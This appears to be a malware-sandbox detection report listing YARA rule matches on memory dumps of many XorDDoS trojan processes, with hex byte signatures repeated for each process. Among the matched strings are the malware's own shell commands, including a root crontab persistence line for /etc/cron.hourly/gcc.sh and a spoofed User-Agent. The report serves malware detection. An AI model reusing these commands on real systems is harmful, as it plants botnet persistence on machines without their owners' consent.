6406.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7953:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6332.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6332.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x8635b:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x863ad:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ac90:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ad89:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6332.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6aef9:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6332.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x28f4:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x2977:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6332.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8e22:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8e8a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6332.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x266c:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6332.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7953:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6454.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6454.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x8635b:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x863ad:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ac90:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ad89:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6454.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6aef9:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6454.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x28f4:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x2977:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6454.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8e22:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8e8a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6454.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x266c:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6454.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7953:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6339.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6339.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x8635b:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x863ad:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ac90:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ad89:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6339.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6aef9:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6339.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x28f4:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x2977:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6339.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8e22:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8e8a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6339.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x266c:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6339.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7953:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6376.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6376.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x8635b:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x863ad:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ac90:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ad89:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6376.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6aef9:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6376.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x28f4:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x2977:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6376.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8e22:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8e8a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6376.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x266c:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6376.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7953:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6325.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6325.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x8635b:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x863ad:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ac90:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ad89:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6325.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6aef9:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6325.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x28f4:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x2977:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6325.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8e22:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8e8a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6325.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x266c:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6325.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7953:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6296.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6296.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x8635b:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x863ad:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ac90:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ad89:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6296.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6aef9:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6296.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x28f4:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x2977:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6296.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8e22:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8e8a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6296.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x266c:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6296.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7953:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6298.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6298.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x8635b:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x863ad:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ac90:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ad89:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6298.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6aef9:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6298.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x28f4:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x2977:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6298.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8e22:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8e8a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6298.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x266c:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6298.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7953:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6308.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6308.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x8635b:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x863ad:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ac90:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ad89:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6308.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6aef9:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6308.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x28f4:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x2977:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6308.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8e22:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8e8a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6308.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x266c:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6308.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7953:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6310.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6310.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x8635b:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x863ad:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ac90:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ad89:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6310.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6aef9:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6310.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x28f4:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x2977:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6310.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8e22:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8e8a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6310.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x266c:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6310.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7953:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6401.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6401.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x8635b:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x863ad:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ac90:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ad89:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6401.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6aef9:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6401.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x28f4:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x2977:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6401.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8e22:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8e8a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6401.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x266c:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6401.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7953:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6423.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6423.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x8635b:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x863ad:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ac90:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ad89:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6423.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6aef9:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6423.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x28f4:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x2977:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6423.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8e22:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8e8a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6423.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x266c:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6423.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7953:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6548.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6548.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x8635b:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x863ad:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ac90:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ad89:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6548.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6aef9:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6548.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x28f4:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x2977:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6548.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8e22:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8e8a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6548.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x266c:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6548.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7953:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6517.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6517.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x8635b:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x863ad:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ac90:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ad89:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6517.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6aef9:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6517.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x28f4:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x2977:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6517.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8e22:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8e8a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6517.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x266c:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6517.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7953:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6237.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6237.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x8635b:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x863ad:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ac90:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ad89:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6237.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6aef9:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6237.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x28f4:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x2977:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6237.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8e22:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8e8a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6237.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x266c:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
